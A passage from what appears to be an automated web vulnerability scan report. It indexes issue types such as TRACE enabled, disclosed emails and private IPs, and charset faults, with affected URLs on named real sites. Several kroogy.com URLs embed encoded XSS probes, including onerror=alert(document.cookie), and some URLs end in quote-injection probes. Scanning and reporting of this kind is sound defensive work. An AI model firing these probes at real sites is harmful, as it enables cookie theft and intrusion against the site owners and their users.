23.77. https://subscribe.haymarketmedia.com/scm/

23.78. http://tags.bluekai.com/site/2576

23.79. http://tags.bluekai.com/site/2576

23.80. http://tours.sapha.com/

23.81. https://verify.authorize.net/anetseal/

23.82. http://www.advisorsquare.com/new/asframeless02/content.asp

23.83. http://www.brownrudnick.com/nr/alertsArchv.asp

23.84. http://www.brownrudnick.com/nr/articlesindv.asp

23.85. http://www.caribbean-ocean.com/accommodation2.php

23.86. http://www.expedia.com/daily/hotels/unpublishedrates/default.asp

23.87. http://www.expedia.com/pub/agent.dll

23.88. http://www.expedia.com/static/default/default/scripts/exp/core/ChannelTracking.js

23.89. https://www.expedia.com/pub/agent.dll

23.90. http://www.hunton.com/aboutus/uniGC.aspx

23.91. http://www.hunton.com/disclaimer/uniGC.aspx

23.92. http://www.hunton.com/news/uniGC.aspx

23.93. http://www.hunton.com/professionals/uniGC.aspx

23.94. http://www.hunton.com/services/uniGC.aspx

23.95. http://www.hunton.com/sitemap/uniGC.aspx

23.96. http://www.lbmc.com/sites/all/modules/extlink/extlink.js

23.97. http://www.nbcconnecticut.com/includes/nbc_share.js

23.98. http://www.nutter.com/attorneys.php

23.99. http://www.nutter.com/careers.php

23.100. http://www.socialfollow.com/button/image/

23.101. http://www.tagged.com/help.html

23.102. http://www.tagged.com/index.html

24. Cross-domain script include

24.1. http://about-tagged.com/

24.2. http://adopt.imiclk.com/emb/q

24.3. http://ads.betfair.com/ad.aspx

24.4. http://ads.betfair.com/ad.aspx

24.5. http://ads.betfair.com/ad.aspx

24.6. http://ads.betfair.com/ad.aspx

24.7. http://ads.betfair.com/ad.aspx

24.8. http://ads.betfair.com/ad.aspx

24.9. http://allatsea.net/

24.10. http://allatsea.net/by-category/Cruising

24.11. http://allatsea.net/by-category/Deep_Sea_Fishing

24.12. http://allatsea.net/by-category/Sailing_Regatta

24.13. http://allatsea.net/classifieds.php

24.14. http://allatsea.net/directclassifieds.php

24.15. http://allatsea.net/subscribe.htm

24.16. http://creative.adonion.com/2_4092.html

24.17. http://fls.doubleclick.net/activityi

24.18. http://googleads.g.doubleclick.net/pagead/ads

24.19. http://googleads.g.doubleclick.net/pagead/ads

24.20. http://googleads.g.doubleclick.net/pagead/ads

24.21. http://iv.doubleclick.net/adi/nbcu.lim.har/news-local-article

24.22. http://kroogy.com/search/web/Linkbucks%20vlad%20modelS

24.23. http://nba.scout.com/

24.24. http://store.kentuckyderby.com/kentucky-derby-merchandise.php

24.25. https://subscribe.haymarketmedia.com/scm/

24.26. http://www.caribbean-ocean.com/

24.27. http://www.caribbean-ocean.com/accommodation2.php

24.28. http://www.caribbean-ocean.com/index.php

24.29. http://www.caribbean-ocean.com/index.php/1'

24.30. http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91

24.31. http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105

24.32. http://www.eneighborhoods.com/

24.33. http://www.expedia.com/default.asp

24.34. http://www.horseracingnation.com/polls/current/kentucky_derby_2011_contenders

24.35. http://www.horseracingnation.com/probables/probables.aspx

24.36. http://www.hunton.com/

24.37. http://www.hunton.com/aboutus/uniGC.aspx

24.38. http://www.hunton.com/alan_kailer/

24.39. http://www.hunton.com/contactus/

24.40. http://www.hunton.com/dallas-united-states-of-america/

24.41. http://www.hunton.com/disclaimer/uniGC.aspx

24.42. http://www.hunton.com/news/uniGC.aspx

24.43. http://www.hunton.com/private_wealth_advisors/

24.44. http://www.hunton.com/professionals/uniGC.aspx

24.45. http://www.hunton.com/services/uniGC.aspx

24.46. http://www.hunton.com/sitemap/uniGC.aspx

24.47. http://www.millerwelds.com/financing/images/powerline_bg.png

24.48. http://www.millerwelds.com/financing/index.php

24.49. http://www.nbcconnecticut.com/

24.50. http://www.nbcconnecticut.com/news/local/Man-Charged-With-Threatening-Malloy-On-Facebook-121424684.html

24.51. http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html

24.52. http://www.nextadvisor.com/favicon.ico

24.53. http://www.socialfollow.com/blog/

24.54. http://www.tagged.com/

24.55. http://www.tagged.com/browse.html

24.56. http://www.tagged.com/find_groups.html

24.57. http://www.tagged.com/help.html

24.58. http://www.tagged.com/index.html

24.59. http://www.tagged.com/safety.html

24.60. http://www.tagged.com/terms_of_service.html

24.61. http://www.twinspiresclub.com/members/join

25. TRACE method is enabled

25.1. http://797-pwy-691.mktoresp.com/

25.2. http://about-tagged.com/

25.3. http://ads.adonion.com/

25.4. http://ads.allatsea.net/

25.5. http://ads.clicksor.com/

25.6. http://allatsea.net/

25.7. http://apps.sapha.com/

25.8. http://bh.contextweb.com/

25.9. http://d.xp1.ru4.com/

25.10. http://dce.sapha.com/

25.11. http://depot.activalive.com/

25.12. http://haymarketbusinesspublications.122.2o7.net/

25.13. http://help.tagged.com/

25.14. http://lbmc.imonitor.net/

25.15. http://learn.bridgefront.com/

25.16. http://microsoftsto.112.2o7.net/

25.17. http://secure-us.imrworldwide.com/

25.18. http://store.kentuckyderby.com/

25.19. http://tags.bluekai.com/

25.20. http://tours.sapha.com/

25.21. http://widgets.digg.com/

25.22. http://www.brownrudnick.com/

25.23. http://www.caribbean-ocean.com/

25.24. http://www.nextadvisor.com/

25.25. http://www.nutter.com/

25.26. http://www.tagged.com/

26. Email addresses disclosed

26.1. http://ads1.msn.com/library/dap.js

26.2. http://allatsea.net/directclassifieds.php

26.3. http://allatsea.net/subscribe.htm

26.4. https://broker.gotoassist.com/favicon.ico

26.5. http://capec.mitre.org/data/definitions/118.html

26.6. http://freeconferencing.liveoffice.com/conferenceonline/scripts/putclicktocall.js

26.7. http://hmficweb.hinghammutual.com/

26.8. http://hmficweb.hinghammutual.com/abouthingham/

26.9. http://hmficweb.hinghammutual.com/abouthingham/Default.aspx

26.10. http://hmficweb.hinghammutual.com/abouthingham/directorsandofficers/

26.11. http://hmficweb.hinghammutual.com/abouthingham/history/

26.12. http://hmficweb.hinghammutual.com/agencylocator/

26.13. http://hmficweb.hinghammutual.com/agents/

26.14. http://hmficweb.hinghammutual.com/billing/

26.15. http://hmficweb.hinghammutual.com/claims/

26.16. http://hmficweb.hinghammutual.com/contactus/

26.17. http://hmficweb.hinghammutual.com/contactus/Default.aspx

26.18. http://hmficweb.hinghammutual.com/default.aspx

26.19. http://hmficweb.hinghammutual.com/privacy/

26.20. http://hmficweb.hinghammutual.com/privacy/Default.aspx

26.21. http://hmficweb.hinghammutual.com/products/

26.22. http://hmficweb.hinghammutual.com/products/cascoauto/

26.23. http://hmficweb.hinghammutual.com/products/commercialinsurance/

26.24. http://hmficweb.hinghammutual.com/products/commercialinsurance/Default.aspx

26.25. http://hmficweb.hinghammutual.com/products/commercialinsurance/bop/

26.26. http://hmficweb.hinghammutual.com/products/commercialinsurance/inlandmarine/

26.27. http://hmficweb.hinghammutual.com/products/personal/

26.28. http://hmficweb.hinghammutual.com/reglogin.aspx

26.29. https://myaccount.nytimes.com/gst/forgot

26.30. https://secure.trust-guard.com/ResetPassword.php

26.31. https://secure.trust-guard.com/index.php

26.32. https://subscribe.haymarketmedia.com/subscribe/CCI_Custserve.aspx

26.33. http://tours.sapha.com/

26.34. http://www.advisorsquare.com/design_gallery/fsplash/ProtectRClick.js

26.35. http://www.advisorsquare.com/new/asframeless02/content.asp

26.36. http://www.advisorsquare.com/new/asle05/content.asp

26.37. http://www.brownrudnick.com/nr/

26.38. http://www.caribbean-ocean.com/

26.39. http://www.caribbean-ocean.com/accommodation2.php

26.40. http://www.caribbean-ocean.com/index.php

26.41. http://www.caribbean-ocean.com/index.php/1'

26.42. http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar.js

26.43. http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/lang/calendar-en.js

26.44. http://www.dominionenterprises.com/site/scripts/s_code.js

26.45. http://www.eneighborhoods.com/common/s_code.js

26.46. http://www.expedia.com/pubspec/scripts/include/overrideHelper.js

26.47. https://www.expedia.com/pubspec/scripts/include/overrideHelper.js

26.48. http://www.hunton.com/include_common/jQuery/dimensions.js

26.49. http://www.hunton.com/include_common/jQuery/jqDnR.js

26.50. http://www.hunton.com/load.vcf

26.51. http://www.lbmc.com/landing/pci.htm

26.52. http://www.lbmc.com/sites/all/modules/extlink/extlink.js

26.53. http://www.nbcconnecticut.com/

26.54. http://www.nbcconnecticut.com/includes/jqModal.js

26.55. http://www.nbcconnecticut.com/includes/nbc_v3_user.js

26.56. http://www.nbcconnecticut.com/news/local/Man-Charged-With-Threatening-Malloy-On-Facebook-121424684.html

26.57. http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html

26.58. http://www.nutter.com/attorneys.php

26.59. http://www.resiteonline.com/resite-login.js

26.60. http://www.socialfollow.com/blog/

26.61. http://www.tagged.com/safety.html

26.62. http://www.tagged.com/terms_of_service.html

26.63. http://www.twinspiresclub.com/common/twinspiresclub.js

27. Private IP addresses disclosed

27.1. http://api.facebook.com/restserver.php

27.2. http://api.facebook.com/restserver.php

27.3. http://api.facebook.com/restserver.php

27.4. http://api.facebook.com/restserver.php

27.5. http://api.facebook.com/restserver.php

27.6. http://api.facebook.com/restserver.php

27.7. http://api.facebook.com/restserver.php

27.8. http://api.facebook.com/restserver.php

27.9. http://api.facebook.com/restserver.php

27.10. http://api.facebook.com/restserver.php

27.11. http://api.facebook.com/restserver.php

27.12. http://connect.facebook.net/en_US/all.js

27.13. http://connect.facebook.net/en_US/all.js

27.14. http://connect.facebook.net/en_US/all.js

27.15. http://dce.sapha.com/engine.php

27.16. http://graph.facebook.com/791551865/picture

27.17. http://media.expedia.com/ads/travelhook/travelhook.js

27.18. http://nba.scout.com/

27.19. http://support.expedia.com/app/answers/list/

27.20. http://support.expedia.com/app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F

27.21. http://support.expedia.com/app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F

27.22. http://tours.sapha.com/

27.23. http://www.expedia.com/pub/agent.dll

27.24. http://www.expedia.com/pub/agent.dll

27.25. http://www.expedia.com/pub/agent.dll

27.26. http://www.expedia.com/pub/agent.dll

27.27. http://www.expedia.com/pub/agent.dll

27.28. http://www.expedia.com/pub/agent.dll

27.29. http://www.expedia.com/pub/agent.dll

27.30. http://www.expedia.com/pub/agent.dll

27.31. http://www.expedia.com/pub/agent.dll

27.32. https://www.expedia.com/pub/agent.dll

27.33. https://www.expedia.com/pub/agent.dll

27.34. https://www.expedia.com/pub/agent.dll

27.35. https://www.expedia.com/pub/agent.dll

27.36. https://www.expedia.com/pub/agent.dll

27.37. https://www.expedia.com/pub/agent.dll

27.38. https://www.expedia.com/pub/agent.dll

27.39. http://www.millerwelds.com/favicon.ico

27.40. http://www.millerwelds.com/financing/images/darkhead_min.png

27.41. http://www.millerwelds.com/financing/images/lighthead_min.png

27.42. http://www.millerwelds.com/financing/images/plinenavbody_min.png

27.43. http://www.millerwelds.com/financing/images/plinenavfoot_min.png

27.44. http://www.millerwelds.com/financing/images/plinenavhead_min.png

27.45. http://www.millerwelds.com/financing/images/powerline_bg.png

27.46. http://www.millerwelds.com/financing/images/powerline_head.png

27.47. http://www.millerwelds.com/images/footer-social-sprite.jpg

27.48. http://www.millerwelds.com/images/go-search.jpg

27.49. http://www.millerwelds.com/images/logo_printable.gif

27.50. http://www.millerwelds.com/images/nav-new/aboutus.gif

27.51. http://www.millerwelds.com/images/nav-new/blog.gif

27.52. http://www.millerwelds.com/images/nav-new/forums.gif

27.53. http://www.millerwelds.com/images/nav-new/indust_interests.gif

27.54. http://www.millerwelds.com/images/nav-new/powerclick01.gif

27.55. http://www.millerwelds.com/images/nav-new/products.gif

27.56. http://www.millerwelds.com/images/nav-new/resources.gif

27.57. http://www.millerwelds.com/images/nav-new/service.gif

27.58. http://www.millerwelds.com/images/nav-new/wheretobuy.gif

27.59. http://www.millerwelds.com/images/navicons.png

28. Robots.txt file

28.1. http://381-kpd-482.mktoresp.com/webevents/visitWebPage

28.2. http://4qinvite.4q.iperceptions.com/1.aspx

28.3. http://797-pwy-691.mktoresp.com/webevents/visitWebPage

28.4. http://ab158636.servedbyadbutler.com/adserve/

28.5. http://about-tagged.com/

28.6. http://action.mathtag.com/mm/rtb/COFC/1008A2/imp

28.7. http://ad.doubleclick.net/adj/scmag.hmktus/sc

28.8. http://admin.instantservice.com/resources/smartbutton/5371/II_Servers.js

28.9. http://ads.allatsea.net/www/delivery/spcjs.php

28.10. http://adsfac.us/ag.asp

28.11. http://allatsea.net/

28.12. http://altfarm.mediaplex.com/ad/js/16228-124632-16454-0

28.13. http://api.facebook.com/restserver.php

28.14. http://apps.sapha.com/appshandler.php

28.15. http://as.casalemedia.com/j

28.16. http://b.rad.msn.com/ADSAdClient31.dll

28.17. http://b.voicefive.com/b

28.18. http://bidder.mathtag.com/iframe/notify

28.19. https://broker.gotoassist.com/h/lbmc

28.20. http://c5.zedo.com/jsc/c5/ff2.html

28.21. http://c7.zedo.com/bar/v16-406/c5/jsc/gl.js

28.22. http://clients1.google.com/webpagethumbnail

28.23. http://d.xp1.ru4.com/activity

28.24. http://dce.sapha.com/engine.php

28.25. http://dinclinx.com/

28.26. http://domains.googlesyndication.com/apps/domainpark/domainpark.cgi

28.27. http://expedia-www.baynote.net/baynote/tags3/common

28.28. http://expedia.com/

28.29. http://fls.doubleclick.net/activityi

28.30. http://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

28.31. http://googleads.g.doubleclick.net/pagead/ads

28.32. http://haymarketbusinesspublications.122.2o7.net/b/ss/haymarketscmagazineus/1/H.21/s84503894906956

28.33. http://help.tagged.com/

28.34. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js

28.35. http://int.teracent.net/tase/int

28.36. http://integration.delivra.com/tracking/default.aspx

28.37. http://jlinks.industrybrains.com/jsct

28.38. http://l.addthiscdn.com/live/t00/250lo.gif

28.39. http://microsoftsto.112.2o7.net/b/ss/msstoohelpall/1/H.20.3/s67880538937170

28.40. https://mosaicsecurity.com/products/1919-pci-scan-annual

28.41. http://nba.scout.com/

28.42. http://now.eloqua.com/visitor/v200/svrGP.aspx

28.43. http://om.expedia.com/b/ss/expedia1/1/G.9p2/s91449721802491

28.44. http://p.addthis.com/pixel

28.45. http://player.ooyala.com/player.js

28.46. http://poll.websitegear.com/compactpoll.asp

28.47. http://search.twitter.com/search.json

28.48. http://segment-pixel.invitemedia.com/pixel

28.49. http://support.expedia.com/app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F

28.50. http://tours.sapha.com/

28.51. http://va.px.invitemedia.com/pixel

28.52. https://verify.authorize.net/anetseal/

28.53. http://widgets.digg.com/buttons/count

28.54. http://www.eneighborhoods.com/

28.55. http://www.expedia.com/daily/styles/3ColFlex1024.css

28.56. https://www.expedia.com/pub/agent.dll

28.57. http://www.hunton.com/

28.58. http://www.lbmc.com/landing/pci.htm

28.59. http://www.millerwelds.com/financing/index.php

28.60. http://www.nextadvisor.com/includes/javascript.php

28.61. http://www.resiteonline.com/

28.62. http://www.socialfollow.com/button/image/

28.63. http://www.tagged.com/

29. Cacheable HTTPS response

29.1. https://broker.gotoassist.com/javaScriptTester.tmpl

29.2. https://mosaicsecurity.com/products/1919-pci-scan-annual

29.3. https://myaccount.nytimes.com/gst/forgot

29.4. https://subscribe.haymarketmedia.com/scm/

29.5. https://subscribe.haymarketmedia.com/subscribe/CCI_Custserve.aspx

29.6. https://www.expedia.com/pub/agent.dll

29.7. https://www.expedia.com/pubspec/scripts/isE3OnHtx.asp

29.8. https://www.taxnotebook.com/CopyRightTN.htm

30. HTML does not specify charset

30.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

30.2. http://480-adver-view.c3metrics.com/v.js

30.3. http://ab158636.servedbyadbutler.com/adserve/

30.4. http://ad.doubleclick.net/adi/N4538.132530.MICROSOFTONLINEINC1/B2304017.8

30.5. http://ad.yieldmanager.com/iframe3

30.6. http://bidder.mathtag.com/iframe/notify

30.7. http://c5.zedo.com/jsc/c5/ff2.html

30.8. http://creative.adonion.com/2_4092.html

30.9. http://fls.doubleclick.net/activityi

30.10. http://freeconferencing.liveoffice.com/conferenceonline/scripts/putclicktocall.js

30.11. http://hmficweb.hinghammutual.com/admin//reglogin.aspx%3fReturnUrl%3d%252fadmin%252fDefault.aspx

30.12. http://hmficweb.hinghammutual.com/billing_view/

30.13. http://hmficweb.hinghammutual.com/billing_view/PaymentDetails.asp

30.14. http://hmficweb.hinghammutual.com/billing_view/login.asp

30.15. http://hmficweb.hinghammutual.com/css/

30.16. http://hmficweb.hinghammutual.com/images/

30.17. http://hmficweb.hinghammutual.com/images/content/

30.18. http://hmficweb.hinghammutual.com/images/content/login/

30.19. http://hmficweb.hinghammutual.com/images/home/

30.20. http://hmficweb.hinghammutual.com/includes/

30.21. http://iv.doubleclick.net/adi/nbcu.lim.har/pid_ap_news-politics-article

30.22. http://kroogy.com/a

30.23. http://kroogy.com/favicon.ico

30.24. http://kroogy.com/pub/banner_160_600.php

30.25. http://kroogy.com/pub/banner_728_90.php

30.26. http://kroogy.com/pub/banner_728_90_random.php

30.27. http://kroogy.com/pub15bf1%3Cimg%20src%3da%20onerror%3dalert(1)%3Ec26cf5636dc/a

30.28. http://kroogy.com/search/web19465%3Cimg%20src%3da%20onerror%3dalert(1)%3E7fccbdccd2f/a

30.29. http://kroogy.com/search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/a

30.30. http://kroogy.com/searchc3d36%3Cimg%20src%3da%20onerror%3dalert(1)%3E1f123855a7/web/a

30.31. http://lbmc.imonitor.net/

30.32. http://login.vindicosuite.com/AccountManager/ResetPassword/Exec_Reset.asp

30.33. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp

30.34. http://login.vindicosuite.com/vindico_dynamic.asp

30.35. http://now.eloqua.com/visitor/v200/svrGP.aspx

30.36. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

30.37. http://store.kentuckyderby.com/cart.php

30.38. http://tags.bluekai.com/site/2576

30.39. http://www.advisorsquare.com/useradmin/Authenticate.asp

30.40. http://www.caribbean-ocean.com/

30.41. http://www.caribbean-ocean.com/accommodation2.php

30.42. http://www.caribbean-ocean.com/index.php

30.43. http://www.caribbean-ocean.com/index.php/1'

30.44. http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91

30.45. http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105

30.46. http://www.caribbean-ocean.com/styles.css

30.47. http://www.caribbean-ocean.com/tabs.js

30.48. http://www.eneighborhoods.com/favicon.ico

30.49. http://www.eneighborhoods.com/menu/homepage/menu.css

30.50. http://www.eneighborhoods.com/menu/menu.css

30.51. http://www.eneighborhoods.com/menu/mm_css_menu.js

30.52. http://www.expedia.com/pubspec/scripts/isE3OnHtx.asp

30.53. https://www.expedia.com/pubspec/scripts/isE3OnHtx.asp

30.54. http://www.ezflexplan.com/ContentPages/employers.html

30.55. http://www.ezflexplan.com/ContentPages/er_admintls.html

30.56. http://www.ezflexplan.com/ContentPages/er_enrllmnttools.html

30.57. http://www.ezflexplan.com/ContentPages/er_htsuap.html

30.58. http://www.ezflexplan.com/ContentPages/nav_employers.html

30.59. http://www.ezflexplan.com/navigation/frameset.asp

30.60. http://www.ezflexplan.com/navigation/menu.asp

30.61. http://www.gofileroom.com/SessionRelease.asp

30.62. http://www.gofileroom.com/lbmc/

30.63. https://www.gofileroom.com/lbmc/Default.asp

30.64. http://www.hunton.com/FCWSite/Features/_xpress/

30.65. http://www.nextadvisor.com/includes/javascript.php

30.66. http://www.nutter.com/attorneys.php

30.67. http://www.nutter.com/careers.php

30.68. http://www.nutter.com/home.php

30.69. http://www.socialfollow.com/button/image/

30.70. http://www.socialfollow.com/js/flash-detect.js

30.71. http://www.socialfollow.com/js/jquery.js

30.72. http://www.socialfollow.com/js/thickbox.js

30.73. http://www.socialfollow.com/js/validator.js

30.74. https://www.taxnotebook.com/CopyRightTN.htm

31. HTML uses unrecognised charset

31.1. http://www.advisorsquare.com/new/asle05/content.asp

31.2. http://www.horseracingnation.com/polls/current/kentucky_derby_2011_contenders

31.3. http://www.horseracingnation.com/probables/probables.aspx

32. Content type incorrectly stated

32.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

32.2. http://480-adver-view.c3metrics.com/v.js

32.3. http://a1.twimg.com/profile_images/258292367/av-2_normal.gif

32.4. http://a2.twimg.com/profile_images/58727890/PIA08370_normal.png

32.5. http://a3.twimg.com/profile_images/282596621/600px-US-OfficeOfScienceAndTechnologyPolicy-Seal_normal.gif

32.6. http://about-tagged.com/wp-content/themes/wptagged/favicon.ico

32.7. http://allatsea.net/assets/social/find_us_on_facebook.png

32.8. http://b.rad.msn.com/ADSAdClient31.dll

32.9. https://broker.gotoassist.com/javaScriptTester.tmpl

32.10. http://dce.sapha.com/engine.php

32.11. http://expedia-www.baynote.net/baynote/tags3/common

32.12. http://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

32.13. http://hmficweb.hinghammutual.com/images/leftcolumn/photo-agents.jpg

32.14. http://learn.bridgefront.com/favicon.ico

32.15. http://media.expedia.com/media/content/expus/graphics/home/wiz/wizard_booking_image.gif

32.16. http://now.eloqua.com/visitor/v200/svrGP.aspx

32.17. http://poll.websitegear.com/compactpoll.asp

32.18. http://sales.liveperson.net/hcp/html/mTag.js

32.19. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

32.20. http://store.kentuckyderby.com/cart.php

32.21. http://store.kentuckyderby.com/favicon.ico

32.22. http://support.expedia.com/ci/ajaxRequest/getReportData

32.23. https://verify.authorize.net/anetseal/images/secure90x72.gif

32.24. http://www.advisorsquare.com/design_gallery/welcome/HP_pict1.jpg

32.25. http://www.advisorsquare.com/design_gallery/welcome/HP_pict2.jpg

32.26. http://www.advisorsquare.com/design_gallery/welcome/HP_pict3.jpg

32.27. http://www.advisorsquare.com/design_gallery/welcome/HP_pict4.jpg

32.28. http://www.advisorsquare.com/new/AccountantSquareDemo/tax_calendar.jpg

32.29. http://www.advisorsquare.com/new/BrochureLevel/GA15_banner.jpg

32.30. http://www.advisorsquare.com/new/BrochureLevel/HP_pict2.jpg

32.31. http://www.advisorsquare.com/new/BrochureLevel/HP_pict3.jpg

32.32. http://www.advisorsquare.com/new/BrochureLevel/HP_welcomePhoto.jpg

32.33. http://www.advisorsquare.com/new/BusinessLevel/FA09Banner.jpg

32.34. http://www.advisorsquare.com/new/BusinessLevel/HP_pict1.jpg

32.35. http://www.advisorsquare.com/new/BusinessLevel/HP_pict2.jpg

32.36. http://www.advisorsquare.com/new/BusinessLevel/HP_pict3.jpg

32.37. http://www.advisorsquare.com/new/BusinessLevel/HP_pict4.jpg

32.38. http://www.advisorsquare.com/new/PremiumLevel/FA03Banner.jpg

32.39. http://www.advisorsquare.com/new/PremiumLevel/HP_pict3.jpg

32.40. http://www.advisorsquare.com/new/PremiumLevel/HP_pict4.jpg

32.41. http://www.advisorsquare.com/new/PremiumLevel/leftframe.jpg

32.42. http://www.advisorsquare.com/new/asframeless02/Business02_asBanner.jpg

32.43. http://www.advisorsquare.com/new/asframeless02/banner_bus02.jpg

32.44. http://www.advisorsquare.com/new/asle04/L3company_pict1.jpg

32.45. http://www.advisorsquare.com/new/asle04/L3company_pict2.jpg

32.46. http://www.advisorsquare.com/new/asle04/L3links_pict1.jpg

32.47. http://www.advisorsquare.com/new/asle04/L3links_pict2.jpg

32.48. http://www.advisorsquare.com/new/asle04/L3products_pict1.jpg

32.49. http://www.advisorsquare.com/new/asle04/home_01.jpg

32.50. http://www.advisorsquare.com/new/asle04/home_02.jpg

32.51. http://www.advisorsquare.com/new/asle04/home_03.jpg

32.52. http://www.advisorsquare.com/new/asle04/place_banner.jpg

32.53. http://www.advisorsquare.com/new/asle05/HP_pict2.jpg

32.54. http://www.advisorsquare.com/new/asle05/asle05_banner.jpg

32.55. http://www.advisorsquare.com/new/asle05/menubg.jpg

32.56. http://www.caribbean-ocean.com/styles.css

32.57. http://www.caribbean-ocean.com/tabs.js

32.58. http://www.dhmiservices.com/ClickContact/js.ashx

32.59. http://www.dominionenterprises.com/site/scripts/qm_slide_effect.js

32.60. http://www.expedia.com/daily/js/flash.vbs

32.61. http://www.expedia.com/pubspec/scripts/isE3OnHtx.asp

32.62. https://www.expedia.com/pubspec/scripts/isE3OnHtx.asp

32.63. http://www.horseracingnation.com/silks/horse/Ack_Ack

32.64. http://www.horseracingnation.com/silks/horse/Affirmed

32.65. http://www.horseracingnation.com/silks/horse/Ancient_Title

32.66. http://www.horseracingnation.com/silks/horse/Animal_Kingdom

32.67. http://www.horseracingnation.com/silks/horse/Archarcharch

32.68. http://www.horseracingnation.com/silks/horse/Armed

32.69. http://www.horseracingnation.com/silks/horse/Arts_And_Letters

32.70. http://www.horseracingnation.com/silks/horse/Assault

32.71. http://www.horseracingnation.com/silks/horse/Bold_Ruler

32.72. http://www.horseracingnation.com/silks/horse/Brilliant_Speed

32.73. http://www.horseracingnation.com/silks/horse/Buckpasser

32.74. http://www.horseracingnation.com/silks/horse/Carry_Back

32.75. http://www.horseracingnation.com/silks/horse/Citation

32.76. http://www.horseracingnation.com/silks/horse/Colin

32.77. http://www.horseracingnation.com/silks/horse/Comma_To_The_Top

32.78. http://www.horseracingnation.com/silks/horse/Cougar

32.79. http://www.horseracingnation.com/silks/horse/Count_Fleet

32.80. http://www.horseracingnation.com/silks/horse/Curlin

32.81. http://www.horseracingnation.com/silks/horse/Damascus

32.82. http://www.horseracingnation.com/silks/horse/Decisive_Moment

32.83. http://www.horseracingnation.com/silks/horse/Derby_Kitten

32.84. http://www.horseracingnation.com/silks/horse/Dialed_In

32.85. http://www.horseracingnation.com/silks/horse/Dr_Fager

32.86. http://www.horseracingnation.com/silks/horse/Equipoise

32.87. http://www.horseracingnation.com/silks/horse/Exceller

32.88. http://www.horseracingnation.com/silks/horse/Foolish_Pleasure

32.89. http://www.horseracingnation.com/silks/horse/Forego

32.90. http://www.horseracingnation.com/silks/horse/Fort_Marcy

32.91. http://www.horseracingnation.com/silks/horse/Gallant_Fox

32.92. http://www.horseracingnation.com/silks/horse/Gallant_Man

32.93. http://www.horseracingnation.com/silks/horse/Holy_Bull

32.94. http://www.horseracingnation.com/silks/horse/John_Henry

32.95. http://www.horseracingnation.com/silks/horse/Kelso

32.96. http://www.horseracingnation.com/silks/horse/Majestic_Prince

32.97. http://www.horseracingnation.com/silks/horse/Man_O_War

32.98. http://www.horseracingnation.com/silks/horse/Master_Of_Hounds

32.99. http://www.horseracingnation.com/silks/horse/Midnight_Interlude

32.100. http://www.horseracingnation.com/silks/horse/Mucho_Macho_Man

32.101. http://www.horseracingnation.com/silks/horse/Nashua_1

32.102. http://www.horseracingnation.com/silks/horse/Native_Dancer

32.103. http://www.horseracingnation.com/silks/horse/Native_Diver

32.104. http://www.horseracingnation.com/silks/horse/Nehro

32.105. http://www.horseracingnation.com/silks/horse/Northern_Dancer

32.106. http://www.horseracingnation.com/silks/horse/Omaha

32.107. http://www.horseracingnation.com/silks/horse/Pants_On_Fire

32.108. http://www.horseracingnation.com/silks/horse/Riva_Ridge

32.109. http://www.horseracingnation.com/silks/horse/Round_Table

32.110. http://www.horseracingnation.com/silks/horse/Ruffian

32.111. http://www.horseracingnation.com/silks/horse/Santiva

32.112. http://www.horseracingnation.com/silks/horse/Seabiscuit

32.113. http://www.horseracingnation.com/silks/horse/Seattle_Slew

32.114. http://www.horseracingnation.com/silks/horse/Secretariat

32.115. http://www.horseracingnation.com/silks/horse/Shackleford

32.116. http://www.horseracingnation.com/silks/horse/Soldat

32.117. http://www.horseracingnation.com/silks/horse/Spectacular_Bid

32.118. http://www.horseracingnation.com/silks/horse/Stay_Thirsty

32.119. http://www.horseracingnation.com/silks/horse/Sunday_Silence

32.120. http://www.horseracingnation.com/silks/horse/Swaps_1

32.121. http://www.horseracingnation.com/silks/horse/Sword_Dancer

32.122. http://www.horseracingnation.com/silks/horse/Sysonby

32.123. http://www.horseracingnation.com/silks/horse/Tom_Fool

32.124. http://www.horseracingnation.com/silks/horse/Twice_The_Appeal

32.125. http://www.horseracingnation.com/silks/horse/Twilight_Tear

32.126. http://www.horseracingnation.com/silks/horse/Twinspired

32.127. http://www.horseracingnation.com/silks/horse/Uncle_Mo

32.128. http://www.horseracingnation.com/silks/horse/Wajima

32.129. http://www.horseracingnation.com/silks/horse/War_Admiral

32.130. http://www.horseracingnation.com/silks/horse/Watch_Me_Go

32.131. http://www.horseracingnation.com/silks/horse/Whirlaway

32.132. http://www.horseracingnation.com/silks/horse/Zenyatta

32.133. http://www.lbmc.com/favicon.ico

32.134. http://www.lbmc.com/misc/favicon.ico

32.135. http://www.lbmc.com/sites/default/files/imagecache/profile-150x200/gherman.jpg

32.136. http://www.millerwelds.com/favicon.ico

